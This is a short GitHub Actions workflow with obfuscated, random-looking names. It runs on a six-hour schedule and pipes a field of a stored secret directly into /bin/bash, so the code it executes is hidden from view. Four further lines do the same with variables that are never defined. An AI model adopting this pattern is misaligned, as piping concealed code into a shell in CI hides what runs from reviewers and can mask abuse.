name: shenshangxian7815
on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shenshangxian7815
        env:
          cxueg623: ${{ secrets.cxueg623 }}
        run: |
          echo $cxueg623 | jq -r .dy1071 | /bin/bash
          echo $hdi463 | jq -r .caub583 | /bin/bash
          echo $r48 | jq -r .tt94669 | /bin/bash
          echo $u2 | jq -r .e03 | /bin/bash
          echo $q09 | jq -r .d1956 | /bin/bash

